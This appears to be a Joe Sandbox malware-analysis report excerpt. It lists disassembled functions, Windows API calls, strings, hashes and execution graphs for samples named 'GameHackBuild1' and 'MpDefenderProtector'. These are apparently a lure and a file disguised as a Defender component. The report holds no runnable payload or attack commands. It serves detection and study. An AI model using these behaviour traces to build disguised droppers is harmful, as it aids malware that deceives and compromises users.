                                      • Instruction ID: 5cae316a80b40a1ae468a35eed28ec0184c9fd94a6d2c294365ce246ad98c46e
                                      • Opcode Fuzzy Hash: 900dabe9da1e24642be7fc51a660d4f9fce64123d38d653b42d1941bbe73a8be
                                      • Instruction Fuzzy Hash: 9541AF3586121EBACF20AF61EE41EEB77A9AF45790F104425F814A71D2E770DA50CA74
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Shell.Explorer$about:blank
                                      • API String ID: 0-874089819
                                      • Opcode ID: 4335bc94f7791ef372a4f60466853f6055ca60dbea5b903580629b0ccd2aec45
                                      • Instruction ID: e3396996968cd398ecfb55465f64273669bc3c92bfe0f792925e91536fc309eb
                                      • Opcode Fuzzy Hash: 4335bc94f7791ef372a4f60466853f6055ca60dbea5b903580629b0ccd2aec45
                                      • Instruction Fuzzy Hash: 53218071604304AFDB08DF68CCA5AAB77A9FF48711B14856DF8098B282DB74EC81CB60
                                      APIs
                                        • Part of subcall function 00A0EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00A0EB92
                                        • Part of subcall function 00A0EB73: GetProcAddress.KERNEL32(00A481C0,CryptUnprotectMemory), ref: 00A0EBA2
                                      • GetCurrentProcessId.KERNEL32(?,?,?,00A0EBEC), ref: 00A0EC84
                                      Strings
                                      • CryptProtectMemory failed, xrefs: 00A0EC3B
                                      • CryptUnprotectMemory failed, xrefs: 00A0EC7C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AddressProc$CurrentProcess
                                      • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                      • API String ID: 2190909847-396321323
                                      • Opcode ID: ede37f8de4163b5e264aa777e100c2d2c7e35501192f4f9c91f119737c2289e1
                                      • Instruction ID: 09acac824aed66305e7d28db14e51613275bfe61e7a9245c73c388cce984bca4
                                      • Opcode Fuzzy Hash: ede37f8de4163b5e264aa777e100c2d2c7e35501192f4f9c91f119737c2289e1
                                      • Instruction Fuzzy Hash: FE115932A0422CAFFB14DB34FE06AAE3754AF41714B04451AFC056B2C1CB7B9E82A7D0
                                      APIs
                                        • Part of subcall function 00A0DA98: _swprintf.LIBCMT ref: 00A0DABE
                                        • Part of subcall function 00A0DA98: _strlen.LIBCMT ref: 00A0DADF
                                        • Part of subcall function 00A0DA98: SetDlgItemTextW.USER32(?,00A3E154,?), ref: 00A0DB3F
                                        • Part of subcall function 00A0DA98: GetWindowRect.USER32(?,?), ref: 00A0DB79
                                        • Part of subcall function 00A0DA98: GetClientRect.USER32(?,?), ref: 00A0DB85
                                      • GetDlgItem.USER32(00000000,00003021), ref: 00A0134F
                                      • SetWindowTextW.USER32(00000000,00A335B4), ref: 00A01365
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                      • String ID: 0
                                      • API String ID: 2622349952-4108050209
                                      • Opcode ID: c9f057c03f9dfb22b772972150a3c7b48c6fd22411ba6c30fec7a75fc5ea94ac
                                      • Instruction ID: 4cd950c5cfaf70da2721d30a5b0588aaaeeb5293d30cf65750cc60f92536897b
                                      • Opcode Fuzzy Hash: c9f057c03f9dfb22b772972150a3c7b48c6fd22411ba6c30fec7a75fc5ea94ac
                                      • Instruction Fuzzy Hash: 1EF0AF7110434CABDFB54FA0AC49BED3BE8BB11345F088414FE495A5E1C778C996EB51
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000000FF,00A1096D,?,?,00A109EF,?,?,?,?,?,00A109D9), ref: 00A10854
                                      • GetLastError.KERNEL32(?,?,00A109EF,?,?,?,?,?,00A109D9), ref: 00A10860
                                        • Part of subcall function 00A06E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A06EAF
                                      Strings
                                      • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00A10869
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                      • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                      • API String ID: 1091760877-2248577382
                                      • Opcode ID: e71792c47d0f819bb27d7b60d3656cd2494884289b70939ce2e768c8baeb11d9
                                      • Instruction ID: f553e692766851d62fbbddb1e7f791e20dd68f89988f95c65b1f55346e34244d
                                      • Opcode Fuzzy Hash: e71792c47d0f819bb27d7b60d3656cd2494884289b70939ce2e768c8baeb11d9
                                      • Instruction Fuzzy Hash: B9D05E3690C53137CA1427A4FD0ADEFB9059F52734F240725F639A51F5DA2109A282E5
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,00A0D32F,?), ref: 00A0DA53
                                      • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00A0D32F,?), ref: 00A0DA61
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: FindHandleModuleResource
                                      • String ID: RTL
                                      • API String ID: 3537982541-834975271
                                      • Opcode ID: 3bc6c7dc366862e6ccaf47155a862c5c5ec914400823c12301446fdc64cffbf0
                                      • Instruction ID: 8263b3b3a1d684e3a45f08e44d25e8c8ad0c592dab4c7c910046fd1ba8c10b46
                                      • Opcode Fuzzy Hash: 3bc6c7dc366862e6ccaf47155a862c5c5ec914400823c12301446fdc64cffbf0
                                      • Instruction Fuzzy Hash: C5C0123338D350B6DF3457A07D0DB432A486B11B52F05048CB141DE5D0D5E5C9418650

                                      Execution Graph

                                      Execution Coverage:7.2%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:33
                                      Total number of Limit Nodes:5
                                      execution_graph 18858 27d5f8c 18860 27d5f17 18858->18860 18859 27d5f9a 18860->18859 18862 27db718 CreateActCtxA 18860->18862 18861 27d5fbe 18862->18861 18824 27de35e 18825 27de396 GetCurrentProcess 18824->18825 18827 27de3e8 GetCurrentThread 18825->18827 18828 27de3e1 18825->18828 18829 27de425 GetCurrentProcess 18827->18829 18831 27de41e 18827->18831 18828->18827 18830 27de45b 18829->18830 18832 27de483 GetCurrentThreadId 18830->18832 18831->18829 18833 27de4b4 18832->18833 18834 27de598 DuplicateHandle 18835 27de62e 18834->18835 18836 27d5e98 18837 27d5ec5 18836->18837 18838 27d5f9a 18837->18838 18841 27db718 18837->18841 18839 27d5fbe 18842 27db73d 18841->18842 18846 27db828 18842->18846 18850 27db818 18842->18850 18843 27db747 18843->18839 18848 27db84f 18846->18848 18847 27db92c 18847->18847 18848->18847 18854 27d7894 18848->18854 18852 27db84f 18850->18852 18851 27db92c 18851->18851 18852->18851 18853 27d7894 CreateActCtxA 18852->18853 18853->18851 18855 27dc8b8 CreateActCtxA 18854->18855 18857 27dc97b 18855->18857

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 528 27de35e-27de3df GetCurrentProcess 532 27de3e8-27de41c GetCurrentThread 528->532 533 27de3e1-27de3e7 528->533 534 27de41e-27de424 532->534 535 27de425-27de459 GetCurrentProcess 532->535 533->532 534->535 537 27de45b-27de461 535->537 538 27de462-27de47d call 27de521 535->538 537->538 540 27de483-27de4b2 GetCurrentThreadId 538->540 542 27de4bb-27de51d 540->542 543 27de4b4-27de4ba 540->543 543->542
                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 027DE3CE
                                      • GetCurrentThread.KERNEL32 ref: 027DE40B
                                      • GetCurrentProcess.KERNEL32 ref: 027DE448
                                      • GetCurrentThreadId.KERNEL32 ref: 027DE4A1
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1312785468.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_27d0000_MpDefenderProtector.jbxd
                                      Similarity
                                      • API ID: Current$ProcessThread
                                      • String ID:
                                      • API String ID: 2063062207-0
                                      • Opcode ID: b8257423805ad2543c3c38b008a8072ea094633cb9945c7e8a74232c8230bb71
                                      • Instruction ID: 81cd4c8ef0a07d226274612d66ed53749b3fea939ed49f386c8a321e2ee83d49
                                      • Opcode Fuzzy Hash: b8257423805ad2543c3c38b008a8072ea094633cb9945c7e8a74232c8230bb71
                                      • Instruction Fuzzy Hash: 9B5144B0900349CFEB15DFA9D548BAEBBF1EB48314F208459E419AB390CB34A945CF66

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1258 27d7894-27dc979 CreateActCtxA 1261 27dc97b-27dc981 1258->1261 1262 27dc982-27dc9dc 1258->1262 1261->1262 1269 27dc9de-27dc9e1 1262->1269 1270 27dc9eb-27dc9ef 1262->1270 1269->1270 1271 27dc9f1-27dc9fd 1270->1271 1272 27dca00 1270->1272 1271->1272 1274 27dca01 1272->1274 1274->1274
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 027DC969
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1312785468.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_27d0000_MpDefenderProtector.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 51be38df00204b1af60bdb5bf870835ca918f0422610827a45f922ef9fba8683
                                      • Instruction ID: 9393d4162df28ce3ead2726ce56b85bc172dd375e4f106597720b1fc930f1fad
                                      • Opcode Fuzzy Hash: 51be38df00204b1af60bdb5bf870835ca918f0422610827a45f922ef9fba8683
                                      • Instruction Fuzzy Hash: 9241C3B1C0071DCBEB25DFA9C844B9DBBF5BF48304F20816AD409AB255DB756946CF90

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1275 27dc8ac-27dc979 CreateActCtxA 1277 27dc97b-27dc981 1275->1277 1278 27dc982-27dc9dc 1275->1278 1277->1278 1285 27dc9de-27dc9e1 1278->1285 1286 27dc9eb-27dc9ef 1278->1286 1285->1286 1287 27dc9f1-27dc9fd 1286->1287 1288 27dca00 1286->1288 1287->1288 1290 27dca01 1288->1290 1290->1290
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 027DC969
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1312785468.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_27d0000_MpDefenderProtector.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 29781d52a7f12eaf038946dd3cdebe1e8b5063441e935792e275b3cba0b9e87a
                                      • Instruction ID: 174cae911cbdb0857740d2a695a2861c967b3df7d8b9a9ff0f4ba9319a51d282
                                      • Opcode Fuzzy Hash: 29781d52a7f12eaf038946dd3cdebe1e8b5063441e935792e275b3cba0b9e87a
                                      • Instruction Fuzzy Hash: 0841F2B1C00719CFEB29DFA9C98479DBBF2BF48304F20816AD409AB255DB756A46CF50

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1291 27de590-27de593 1292 27de598-27de62c DuplicateHandle 1291->1292 1293 27de62e-27de634 1292->1293 1294 27de635-27de652 1292->1294 1293->1294
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 027DE61F
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1312785468.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_27d0000_MpDefenderProtector.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: 9503af3685ea8eeea3e6a03d492bfc9b13a2553d536068e986d00abca9fd9447
                                      • Instruction ID: 861f08645dbdc48bbfc13f8030accb3245ca80a5ed8239cc94dfe03d3c37a68c
                                      • Opcode Fuzzy Hash: 9503af3685ea8eeea3e6a03d492bfc9b13a2553d536068e986d00abca9fd9447
                                      • Instruction Fuzzy Hash: DC2114B5D00309AFDB10CF9AD884ADEBBF4EB48324F14801AE914A3310D379A941CFA5

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1297 27de598-27de62c DuplicateHandle 1298 27de62e-27de634 1297->1298 1299 27de635-27de652 1297->1299 1298->1299
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 027DE61F
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1312785468.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_27d0000_MpDefenderProtector.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: 7f7e391e59210dc68670b4a3e1dcdb69218737b5a3d69fb22aaa33d91e04f713
                                      • Instruction ID: defb8dccff0d8202a1b6bcd880da6f51764c85cef3a5f4f7d96e384a4dd50018
                                      • Opcode Fuzzy Hash: 7f7e391e59210dc68670b4a3e1dcdb69218737b5a3d69fb22aaa33d91e04f713
                                      • Instruction Fuzzy Hash: 7021E4B5D003099FDB10CF9AD984ADEBBF5EB48320F14801AE914A7350D378A945CF65

                                      Execution Graph

                                      Execution Coverage:9.8%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:0%
                                      Total number of Nodes:1504
                                      Total number of Limit Nodes:27
                                      execution_graph 22910 eeaee0 22911 eeaeea __EH_prolog 22910->22911 23073 ed130b 22911->23073 22914 eeaf2c 22918 eeaf39 22914->22918 22919 eeafa2 22914->22919 22978 eeaf18 22914->22978 22915 eeb5cb 23151 eecd2e 22915->23151 22923 eeaf3e 22918->22923 22924 eeaf75 22918->22924 22922 eeb041 GetDlgItemTextW 22919->22922 22928 eeafbc 22919->22928 22920 eeb5e9 SendMessageW 22921 eeb5f7 22920->22921 22926 eeb600 SendDlgItemMessageW 22921->22926 22927 eeb611 GetDlgItem SendMessageW 22921->22927 22922->22924 22925 eeb077 22922->22925 22933 edddd1 53 API calls 22923->22933 22923->22978 22929 eeaf96 KiUserCallbackDispatcher 22924->22929 22924->22978 22930 eeb08f GetDlgItem 22925->22930 23070 eeb080 22925->23070 22926->22927 23169 ee9da4 GetCurrentDirectoryW 22927->23169 22932 edddd1 53 API calls 22928->22932 22929->22978 22935 eeb0a4 SendMessageW SendMessageW 22930->22935 22936 eeb0c5 SetFocus 22930->22936 22937 eeafde SetDlgItemTextW 22932->22937 22938 eeaf58 22933->22938 22934 eeb641 GetDlgItem 22939 eeb65e 22934->22939 22940 eeb664 SetWindowTextW 22934->22940 22935->22936 22941 eeb0d5 22936->22941 22953 eeb0ed 22936->22953 22942 eeafec 22937->22942 23191 ed1241 SHGetMalloc 22938->23191 22939->22940 23170 eea2c7 GetClassNameW 22940->23170 22947 edddd1 53 API calls 22941->22947 22951 eeaff9 GetMessageW 22942->22951 22942->22978 22944 eeaf5f 22948 eeaf63 SetDlgItemTextW 22944->22948 22944->22978 22945 eeb56b 22949 edddd1 53 API calls 22945->22949 22952 eeb0df 22947->22952 22948->22978 22954 eeb57b SetDlgItemTextW 22949->22954 22956 eeb010 IsDialogMessageW 22951->22956 22951->22978 23192 eecb5a 22952->23192 22961 edddd1 53 API calls 22953->22961 22958 eeb58f 22954->22958 22956->22942 22960 eeb01f TranslateMessage DispatchMessageW 22956->22960 22964 edddd1 53 API calls 22958->22964 22960->22942 22963 eeb124 22961->22963 22962 eeb6af 22966 eeb6df 22962->22966 22971 edddd1 53 API calls 22962->22971 22967 ed400a _swprintf 51 API calls 
22963->22967 22968 eeb5b8 22964->22968 22965 eebdf5 98 API calls 22965->22962 22977 eebdf5 98 API calls 22966->22977 23021 eeb797 22966->23021 22972 eeb136 22967->22972 22973 edddd1 53 API calls 22968->22973 22969 eeb0e6 23083 eda04f 22969->23083 22975 eeb6c2 SetDlgItemTextW 22971->22975 22976 eecb5a 16 API calls 22972->22976 22973->22978 22985 edddd1 53 API calls 22975->22985 22976->22969 22986 eeb6fa 22977->22986 22979 eeb847 22982 eeb859 22979->22982 22983 eeb850 EnableWindow 22979->22983 22980 eeb17f 23089 eea322 SetCurrentDirectoryW 22980->23089 22981 eeb174 GetLastError 22981->22980 22987 eeb876 22982->22987 23210 ed12c8 GetDlgItem EnableWindow 22982->23210 22983->22982 22989 eeb6d6 SetDlgItemTextW 22985->22989 22995 eeb70c 22986->22995 23009 eeb731 22986->23009 22994 eeb89d 22987->22994 23001 eeb895 SendMessageW 22987->23001 22988 eeb195 22992 eeb19e GetLastError 22988->22992 22993 eeb1ac 22988->22993 22989->22966 22991 eeb78a 22997 eebdf5 98 API calls 22991->22997 22992->22993 23000 eeb227 22993->23000 23005 eeb237 22993->23005 23006 eeb1c4 GetTickCount 22993->23006 22994->22978 23002 edddd1 53 API calls 22994->23002 23208 ee9635 32 API calls 22995->23208 22996 eeb86c 23211 ed12c8 GetDlgItem EnableWindow 22996->23211 22997->23021 23004 eeb46c 23000->23004 23000->23005 23001->22994 23008 eeb8b6 SetDlgItemTextW 23002->23008 23003 eeb725 23003->23009 23108 ed12e6 GetDlgItem ShowWindow 23004->23108 23011 eeb24f GetModuleFileNameW 23005->23011 23012 eeb407 23005->23012 23090 ed400a 23006->23090 23007 eeb825 23209 ee9635 32 API calls 23007->23209 23008->22978 23009->22991 23016 eebdf5 98 API calls 23009->23016 23202 edeb3a 80 API calls 23011->23202 23012->22924 23025 edddd1 53 API calls 23012->23025 23015 edddd1 53 API calls 23015->23021 23022 eeb75f 23016->23022 23017 eeb47c 23109 ed12e6 GetDlgItem ShowWindow 23017->23109 23019 eeb1dd 23093 ed971e 23019->23093 23020 eeb844 23020->22979 23021->22979 23021->23007 23021->23015 23022->22991 23026 eeb768 
DialogBoxParamW 23022->23026 23024 eeb275 23028 ed400a _swprintf 51 API calls 23024->23028 23029 eeb41b 23025->23029 23026->22924 23026->22991 23027 eeb486 23110 edddd1 23027->23110 23031 eeb297 CreateFileMappingW 23028->23031 23032 ed400a _swprintf 51 API calls 23029->23032 23037 eeb2f9 GetCommandLineW 23031->23037 23067 eeb376 __vsnwprintf_l 23031->23067 23034 eeb439 23032->23034 23048 edddd1 53 API calls 23034->23048 23035 eeb203 23038 eeb20a GetLastError 23035->23038 23039 eeb215 23035->23039 23042 eeb30a 23037->23042 23038->23039 23101 ed9653 23039->23101 23040 eeb381 ShellExecuteExW 23062 eeb39e 23040->23062 23203 eeab2e SHGetMalloc 23042->23203 23045 eeb4a2 SetDlgItemTextW GetDlgItem 23046 eeb4bf GetWindowLongW SetWindowLongW 23045->23046 23047 eeb4d7 23045->23047 23046->23047 23114 eebdf5 23047->23114 23048->22924 23049 eeb326 23204 eeab2e SHGetMalloc 23049->23204 23053 eeb332 23205 eeab2e SHGetMalloc 23053->23205 23054 eeb3e1 23054->23012 23061 eeb3f7 UnmapViewOfFile CloseHandle 23054->23061 23055 eebdf5 98 API calls 23057 eeb4f3 23055->23057 23139 eed0f5 23057->23139 23058 eeb33e 23206 edecad 80 API calls ___scrt_get_show_window_mode 23058->23206 23061->23012 23062->23054 23065 eeb3cd Sleep 23062->23065 23064 eeb355 MapViewOfFile 23064->23067 23065->23054 23065->23062 23066 eebdf5 98 API calls 23071 eeb519 23066->23071 23067->23040 23068 eeb542 23207 ed12c8 GetDlgItem EnableWindow 23068->23207 23070->22924 23070->22945 23071->23068 23072 eebdf5 98 API calls 23071->23072 23072->23068 23074 ed136d 23073->23074 23075 ed1314 23073->23075 23213 edda71 GetWindowLongW SetWindowLongW 23074->23213 23076 ed137a 23075->23076 23212 edda98 62 API calls 2 library calls 23075->23212 23076->22914 23076->22915 23076->22978 23079 ed1336 23079->23076 23080 ed1349 GetDlgItem 23079->23080 23080->23076 23081 ed1359 23080->23081 23081->23076 23082 ed135f SetWindowTextW 23081->23082 23082->23076 23086 eda059 23083->23086 23084 eda0ea 23085 eda207 9 API calls 23084->23085 23087 
eda113 23084->23087 23085->23087 23086->23084 23086->23087 23214 eda207 23086->23214 23087->22980 23087->22981 23089->22988 23261 ed3fdd 23090->23261 23094 ed9728 23093->23094 23095 ed9786 23094->23095 23096 ed9792 CreateFileW 23094->23096 23097 ed97e4 23095->23097 23098 edb66c 2 API calls 23095->23098 23096->23095 23097->23035 23099 ed97cb 23098->23099 23099->23097 23100 ed97cf CreateFileW 23099->23100 23100->23097 23102 ed9688 23101->23102 23103 ed9677 23101->23103 23102->23000 23103->23102 23104 ed968a 23103->23104 23105 ed9683 23103->23105 23353 ed96d0 23104->23353 23348 ed9817 23105->23348 23108->23017 23109->23027 23368 edddff 23110->23368 23113 ed12e6 GetDlgItem ShowWindow 23113->23045 23115 eebdff __EH_prolog 23114->23115 23121 eeb4e5 23115->23121 23391 eeaa36 23115->23391 23117 eebe36 _wcsrchr 23119 eeaa36 ExpandEnvironmentStringsW 23117->23119 23120 eec11d SetWindowTextW 23117->23120 23117->23121 23126 eebf0b SetFileAttributesW 23117->23126 23131 eec2e7 GetDlgItem SetWindowTextW SendMessageW 23117->23131 23134 eec327 SendMessageW 23117->23134 23395 ee17ac CompareStringW 23117->23395 23396 ee9da4 GetCurrentDirectoryW 23117->23396 23398 eda52a 7 API calls 23117->23398 23399 eda4b3 FindClose 23117->23399 23400 eeab9a 76 API calls new 23117->23400 23401 ef35de 23117->23401 23119->23117 23120->23117 23121->23055 23127 eebfc5 GetFileAttributesW 23126->23127 23138 eebf25 ___scrt_get_show_window_mode 23126->23138 23127->23117 23130 eebfd7 DeleteFileW 23127->23130 23130->23117 23132 eebfe8 23130->23132 23131->23117 23133 ed400a _swprintf 51 API calls 23132->23133 23135 eec008 GetFileAttributesW 23133->23135 23134->23117 23135->23132 23136 eec01d MoveFileW 23135->23136 23136->23117 23137 eec035 MoveFileExW 23136->23137 23137->23117 23138->23117 23138->23127 23397 edb4f7 52 API calls 2 library calls 23138->23397 23140 eed0ff __EH_prolog 23139->23140 23425 edfead 23140->23425 23142 eed130 23429 ed5c59 23142->23429 23144 eed14e 23433 ed7c68 23144->23433 23148 eed1a1 
23450 ed7cfb 23148->23450 23150 eeb504 23150->23066 23152 eecd38 23151->23152 23923 ee9d1a 23152->23923 23155 eeb5d1 23155->22920 23155->22921 23156 eecd45 GetWindow 23156->23155 23161 eecd65 23156->23161 23157 eecd72 GetClassNameW 23928 ee17ac CompareStringW 23157->23928 23159 eecdfa GetWindow 23159->23155 23159->23161 23160 eecd96 GetWindowLongW 23160->23159 23162 eecda6 SendMessageW 23160->23162 23161->23155 23161->23157 23161->23159 23161->23160 23162->23159 23163 eecdbc GetObjectW 23162->23163 23929 ee9d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23163->23929 23165 eecdd3 23930 ee9d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23165->23930 23931 ee9f5d 8 API calls ___scrt_get_show_window_mode 23165->23931 23168 eecde4 SendMessageW DeleteObject 23168->23159 23169->22934 23171 eea2e8 23170->23171 23177 eea30d 23170->23177 23934 ee17ac CompareStringW 23171->23934 23173 eea31b 23178 eea7c3 23173->23178 23174 eea312 SHAutoComplete 23174->23173 23175 eea2fb 23176 eea2ff FindWindowExW 23175->23176 23175->23177 23176->23177 23177->23173 23177->23174 23179 eea7cd __EH_prolog 23178->23179 23180 ed1380 82 API calls 23179->23180 23181 eea7ef 23180->23181 23935 ed1f4f 23181->23935 23184 eea818 23186 ed1951 126 API calls 23184->23186 23185 eea809 23187 ed1631 84 API calls 23185->23187 23189 eea83a __vsnwprintf_l new 23186->23189 23188 eea814 23187->23188 23188->22962 23188->22965 23189->23188 23190 ed1631 84 API calls 23189->23190 23190->23188 23191->22944 23943 eeac74 PeekMessageW 23192->23943 23195 eecbbc SendMessageW SendMessageW 23197 eecbf8 23195->23197 23198 eecc17 SendMessageW SendMessageW SendMessageW 23195->23198 23196 eecb88 23201 eecb93 ShowWindow SendMessageW SendMessageW 23196->23201 23197->23198 23199 eecc6d SendMessageW 23198->23199 23200 eecc4a SendMessageW 23198->23200 23199->22969 23200->23199 23201->23195 23202->23024 23203->23049 23204->23053 23205->23058 23206->23064 23207->23070 23208->23003 23209->23020 23210->22996 23211->22987 23212->23079 
23213->23076 23215 eda214 23214->23215 23216 eda238 23215->23216 23217 eda22b CreateDirectoryW 23215->23217 23235 eda180 23216->23235 23217->23216 23219 eda26b 23217->23219 23224 eda27a 23219->23224 23227 eda444 23219->23227 23221 eda27e GetLastError 23221->23224 23224->23086 23225 eda254 23225->23221 23226 eda258 CreateDirectoryW 23225->23226 23226->23219 23226->23221 23248 eee360 23227->23248 23230 eda494 23230->23224 23231 eda467 23232 edb66c 2 API calls 23231->23232 23233 eda47b 23232->23233 23233->23230 23234 eda47f SetFileAttributesW 23233->23234 23234->23230 23250 eda194 23235->23250 23238 edb66c 23239 edb679 23238->23239 23240 edb683 23239->23240 23258 edb806 CharUpperW 23239->23258 23240->23225 23242 edb692 23259 edb832 CharUpperW 23242->23259 23244 edb6a1 23245 edb71c GetCurrentDirectoryW 23244->23245 23246 edb6a5 23244->23246 23245->23240 23260 edb806 CharUpperW 23246->23260 23249 eda451 SetFileAttributesW 23248->23249 23249->23230 23249->23231 23251 eee360 23250->23251 23252 eda1a1 GetFileAttributesW 23251->23252 23253 eda189 23252->23253 23254 eda1b2 23252->23254 23253->23221 23253->23238 